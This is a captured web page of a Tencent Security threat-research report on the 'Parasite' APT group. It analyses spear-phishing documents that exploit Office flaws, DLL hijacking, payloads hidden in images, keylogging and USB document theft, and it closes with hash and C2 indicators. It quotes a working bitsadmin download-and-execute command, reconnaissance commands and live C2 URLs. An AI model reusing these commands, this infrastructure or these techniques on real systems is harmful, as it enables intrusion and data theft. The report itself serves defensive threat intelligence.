s.tencent.com Open in urlscan Pro
43.135.106.184  Public Scan

URL: https://s.tencent.com/research/report/465.html'
Submission: On January 24 via api from BR — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

 * 产品中心
   
   产品中心
   
    * 基础安全
      
      T-Sec 主机安全
      
      容器安全服务 TCSS
      
      T-Sec DDos防护
      
      T-Sec Web应用防火墙
      
      T-Sec 云防火墙
      
      T-Sec 安全运营中心
      
      T-Sec iOA零信任安全管理系统
   
    * 业务安全
      
      T-Sec 天御 验证码
      
      T-Sec 天御 文本内容安全
      
      T-Sec 天御 视频内容安全
      
      T-Sec 全栈式风控引擎
      
      T-Sec 手游安全
      
      T-Sec 小程序安全
      
      T-Sec 应用合规平台
   
    * 数据安全
      
      T-Sec 堡垒机
      
      T-Sec 数据安全审计
      
      T-Sec 云访问安全代理
      
      T-Sec 凭据管理系统
      
      T-Sec 密钥管理系统
      
      T-Sec 云加密机
      
      T-Sec 数据安全治理中心
   
    * 安全服务
      
      T-Sec 安全专家服务
      
      等保合规服务
      
      T-Sec 安全托管服务
      
      渗透测试服务
      
      应急响应服务
      
      重要时期安全保障服务
      
      安全攻防对抗服务
   
   了解全部安全产品→

 * 解决方案
   
   解决方案
   
    * 通用解决方案
      
      等保合规安全解决方案
      
      直播安全解决方案
      
      数据安全解决方案
      
      运维解决方案
      
      品牌保护解决方案
      
      高防云主机安全
      
      腾讯安心平台解决方案
   
    * 安全专项解决方案
      
      勒索病毒专项解决方案
   
   游戏行业云上风险安全报告了解更多
   
   腾讯安全根据游戏企业云上安全数据整理,通过安全检测数据观察游戏行业云上业务所面临所安全挑战。

 * 新闻中心

 * 威胁研究

 * 合作伙伴

 * 更多
   
   更多
   
    * 关于我们
      
      腾讯安全介绍
      
      荣誉认证
   
    * 帮助中心
      
      帮助文档
      
      在线课堂
      
      考试入口
   
    * 开启你的安全之旅
      
      联系我们
      
      寻求市场合作
   
    * 友情链接
      
      腾讯云


未登录
 * 登录可以享受
 * 精准服务推荐
 * 线上快捷下单
 * 海量资源流量
 * 立即登录

威胁研究正文


最新APT组织“寄生兽”活动披露

2018-04-23 07:20:09

“寄生兽”APT组织(T-APT-02)是腾讯御见威胁情报中心2017年捕获并开始追踪的高级APT组织。寄生兽的出现不仅对广大用户来说是一个重大的威胁,对于安全厂商来说也是一个重大的挑战...

一、概述

“寄生兽”APT组织(T-APT-02)是腾讯御见威胁情报中心2017年捕获并开始追踪的高级APT组织。该组织的主要特点如下:

1) 该组织攻击所使用的木马是专有木马,手段新颖,且使用范围小,只针对特定对象进行攻击,因此至今未被披露过;

2)
该组织喜欢把木马隐藏在开源的代码中进行伪装,如putty、openssl、zlib等,把少量木马代码隐藏在大量的开源代码中,从而实现躲避检测的目的,因此将其取名“寄生
兽”;

3)
该组织经常使用漏洞将木马捆绑成office系列文件进行传播,包括近期流行的CVE-2017-11882、CVE-2017-8570等,甚至我们发现该木马的插件还能够利用CVE-2017-8570漏洞对用户U盘中的office系列文件进行感染,捆上木马从而实现磁盘传播;

4) 该木马主要以插件形式工作,针对不同人群释放不同功能插件,十分灵活。插件的功能包括且不限于:

a)     获取并上传可移动磁盘中特定格式的文档;

b)     记录并上传活动窗口标题和按键信息;

c)      定时截屏并上传;

d)     下载DLL并执行,在局域网内渗透;

e)     将可移动磁盘中的office文档转换为rtf格式再捆绑漏洞攻击木马;

f)      获取本地邮箱、浏览器存储的密码;

二、载荷投递

“寄生兽”APT组织的攻击方式为鱼叉攻击,利用最新的office漏洞进行攻击。以捕捉到的某个诱饵文件(letter.doc)为例进行分析。

该文件使用当时最新的office漏洞CVE-2017-11882进行精心构造,漏洞触发后,执行如下命令:

cmd /c "bitsadmin /transfer m /download http://luriasstereo.net/i.bat
%temp%/i.bat&%temp%/i.bat"

i.bat分析:

该文件内容如下,主要功能是启动一个powershell,并执行随后的powershell脚本,脚本经过编码和加密。






图1

解密后内容如下,功能是下载hxxp://luriasstereo.net/a.php脚本回来运行。    




图2

a.php分析

a.php内容如下:




图3

可以看出,该脚本主要功能是将编码加密过的4个变量解密出来写入到

%temp% \OE45QH5H

%temp%\VO26IE53

%temp%\OE45QH6H

%temp%\VO26IE54

4个文件中,最后再解密出一段脚本出来执行。

解码后的部分脚本如下:




图4

其功能是判断系统是32位或者64位,进而用AES解密相对应的文件(x64:OE45QH6H、VO26IE54,x86:
OE45QH5H、VO26IE53),解密后分别将其移动到

%windir%\system32\msfte.dll

%windir%\system32\NTWDBLIB.dll

随后启动%windir%\System32\cliconfg.exe(这个是系统自带SQL相关文件,启动后会加载msfte.dll、NTWDBLIB.dll)

NTWDBLIB.dll分析

1)
将系统WSerch服务设置为开机自启动(其实该服务系统默认就是自启动的,该系统服务SearchIndexer.exe会加载msfte.dll,从而木马开机能够自启动)。




图5

2) 检测服务启动状态,当检测到服务成功启动后,创建MO4TH2H0.bat文件执行自删除操作(删除NTWDBLIB.dll)




图6

msfte.dll分析:

该文件会被cliconfg.exe进程加载,也会在系统重启后被WSerch服务的主进程(SearchIndexer.exe)加载,该模块启动后,在dllmain中判断当前加载自身的进程是否为SearchIndexer.exe,如果是,则将系统文件SearchProtocolHost.exe拷贝两份分别为

%windir%\system32\SearchWindowsHost.exe

%windir%\system32\SearchFolderHost.exe

并分别以system权限(svchost.exe)和当前用户权限(explorer.exe)运行拷贝后的文件。




图7




图8




图9




图10

系统自带的SearchProtocolHost.exe文件会尝试加载msfte.dll文件并调用其AccessRetailTracer或AccessDebugTracer接口函数,木马msfte.dll文件当然也导出了这两个函数。

注:以下两张代码截图为系统SearchProtocolHost.exe文件相关代码




图11




图12

AccessRetailTracer或AccessDebugTracer函数行为:

首先尝试读取当前目录下的config.ini,获取C2地址,如果没有找到则解密内置的全局变量






图13

木马本身不会自带config.ini,但C2可以根据需要下发config.ini从而改变C2地址,木马内置C2信息解密结果如下:

http://windows-updater.net/_radiostar/kill.php;

http://37281933.net/_radiostar/kill.php;

参数有:

p=M(用户权限)或P=H(系统权限)

&inst=7917(代表动作)

name=E.Edie-1(木马备注)




图14

此外,木马http请求为post,附加数据为8字节随机数




图15




图16

木马通过http协议发送请求后接收数据,分析过程中实际接收到一张尾部附有恶意代码的图片。




图17




图18

如果没有post 8字节数据到服务器的话,服务器会返回一张正常的纪念碑谷图片:




图19

返回图片后,会从尾部开始读取数据,并校验和抽取playload




图20

解密算法如下:




图21

判断解密后的数据前3字节是否为DLL,如果是则在内存中加载执行偏移+23处开始的PE文件




图22

真实解密后的数据头部如下:






图23

在PE文件中查找ReflectiveLoader,并修改内存属性,跳转到该PE文件中执行,ReflectiveLoader函数自己完成PE文件在内存映射加载功能。




图24






图25

三、payload分析

木马核心playload被下载后在内存中展开执行,文件不落地。主要功能为三部分

1) 插件加载:加载、执行指定目录下的exe或dll文件;

2) 上传插件收集的文件:上传指定目录下的指定扩展名的文件;

3) 接收C2下发的远程控制命令。

playload自身功能比较简单,主要包含两个线程和一个命令循环。




图26

线程1功能:

每隔10分钟检测指定目录下是否有新的插件,如果有则加载或执行

插件目录:

%ALLUSERSPROFILE%\GE4FH28Q;

C:\Windows\System32\Wbem\xml;

插件文件名:

SearchWindowsHost.exe进程

DDL插件名称:cryptcore.dll;dmext.dll;aucodhw.dll

EXE插件名称:msdvc.exe;taskhlp.exe

SearchFolderHost.exe进程

DDL插件名称:helpcst.dll;kbdlu.dll;sdihlp.dll

EXE插件名称:iusbmon.exe;nvcsvc.exe;hlpsvc.exe;




图27




图28

线程2功能:

每隔10分钟上传指定目录下在的指定拓展名文件(这些文件应该都是插件各个功能插件收集到的信息)

目录:

%ALLUSERSPROFILE%\AU50FE1D;

%ALLUSERSPROFILE%\GE4FH28Q

文件扩展名:

.txt;.tmp;.dat;.dot;.rar




图29




图30

远控命令循环:

通过执行cmd命令获取系统各种信息,解密后post到C2,命令如下:

"/c systeminfo"  

"/c ""tasklist /v"""

"/c ""netstat -ano"""

"/c ""ipconfig /all"""

"/c ""route print"""

以上命令分别是获取系统信息,获取进程信息,获取网络连接信息,获取网络配置信息,获取路由表等。




图31

该木马支持以下命令:




图32




图33




图34




图35




图36



相关插件为:




图37

部分插件分析如下:

1) dmext.dll

其功能是获取可移动磁盘中的指定类型文件,包括.txt、.hwp、.doc、.docx、.xls、.xlsx、.ppt、.pptx、.pdf,其中.hwp是韩国常见的文档类型:




图38

检测可移动磁盘插入消息:




图39

2) kbdlu.dll

键盘记录插件:主要功能是通过RegisterRawInputDevices
、GetRawInputData记录用户所有按键信息,并记录按键时的当前窗口标题,定时写入到上传目录中。

获取按键信息:




图40

获取窗口标题:






图41

3) sdihlp.dll

截屏插件:定时截取屏幕图片,并保存到上传目录中。




图42

4) cryptcore.dll

内网渗透插件:该插件主要功能是从指定地址下载meterpreter模块到内存中指定,常用于执行命令、内网渗透等。




图43

5) infsvc.exe

U盘office文档感染插件:该插件是我们2018年3月最新捕获到的插件,该插件实现的功能是每隔10秒中检测一次可移动磁盘,通过特征查找其中的office类文档文件,找到后利用docto.exe将其转换成rtf写字板格式,并利用CVE-2017-
8570捆绑上木马,已实现通过可移动磁盘在隔离网络传播。

检测可移动磁盘:




图44

通过特征检测可移动磁盘中的文件是否为office类文件:






图45

如果是office类文件则捆绑木马:




图46

CVE-2017- 8570漏洞利用捆绑相关代码:




图47

6) docto.exe

文件为网络上开源的文档转换工具,能够转换多种不同格式的文档,开源项目地址(https://github.com/tobya/DocTo/)




图48



四、总结



寄生兽的出现不仅对广大用户来说是一个重大的威胁,对于安全厂商来说也是一个重大的挑战,网络中拥有海量的开源代码,将少量的恶意代码隐藏在海量的开源代码中,大大增加了安全厂商发现恶意代码的难度。此外,寄生兽组织所用的恶意模块内存加载不落地、恶意功能插件化等技术也代表了新型威胁的趋势。寄生兽组织使用漏洞感染用户可移动磁盘中的office文档也是在定向网络攻击中第一次被发现的,甚至威胁着物理隔离网络的信息安全。

因此,我们提醒政府、企业等广大用户,切勿随意打开来历不明的邮件附件,同时安装安全软件。对于隔离网络之间用于摆渡的可移动磁盘,务必使用专业安全软件扫描检测。目前,腾讯御界高级威胁检测系统已经可以检测并阻断该轮攻击的连接行为。

御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。凭借基于行为的防护和智能模型两大核心能力,御界高级威胁检测系统可高效检测未知威胁,并通过对企业内外网边界处网络流量的分析,感知漏洞的利用和攻击。通过部署御界高级威胁检测系统,及时感知恶意流量,检测钓鱼网址和远控服务器地址在企业网络中的访问情况,保护企业网络安全。




图49

五、附录(IOCs)

文件hash

28e434a304e99d3b01ae8ac557c8f256

a0ef9bf38cd759fd6ddd1f6f93406284

08fd1e9374266cc0d9304757913ddac9

842366795efde36c321059db44be6163

3244a208715e1a4ced1e626d74fe7fd2

0a5aac8e9c17ecaa7de4b7949198321c

7abd7a9ee4eb8a89b5bd423612f87a6d

c100213f5a961039ed35a1e776fc65c7

00f048d0fbb3d6d1bf0c3e0c910c1805

e884f0cb851137bd73b2eb70a110655b

da3255aa260090589543a807aeaa3894

1b982fd90168f50d0f6b5c72461a48cc

e02fad27032a0373812100c8d7b0959b

573a67b5dda7346f338f1f380b300e7b

62ae0da3a12be98e641828d11a990bce

a1179f2fc248ccc2f9eafc6d04928515

39aba73891b2c6bc96a34dd28df41358

8d5271ee2d503e697232ada1e3775a85

3dee6f79039eaa22319d1990540929b2

92480c1a771d99dbef00436e74c9a927

3dab0965ab27825ac10b3d8f50db86b6



C&C:

hxxp://makethemeasier.com/TT2/config.php

hxxp://100100011100.com/_sexygirl/userinfo.php

hxxp://star--co.net/_sexygirl/userinfo.php

hxxp://luriasstereo.net/_sexygirl/userinfo.php

hxxp://windows-updater.net/_radiostar/kill.php

hxxp://37281933.net/_radiostar/kill.php

hxxp://gw-engine.com/i33po/profile.php

hxxp://help-software.org/i33po/profile.php



 * 产品方案
   
   * 产品中心

 * 威胁研究
   
   * 威胁通告
   * 研究报告

 * 合作伙伴
   
   * 合作伙伴详情

 * 其他
   
   * 腾讯安全介绍
   * 新闻活动
   * 在线课堂

 * 友情链接
   
   * 腾讯云

腾讯安全公众号

腾讯安全视频中心

Copyright©1998-2023 Tencent. All Rights Reserved.

在线咨询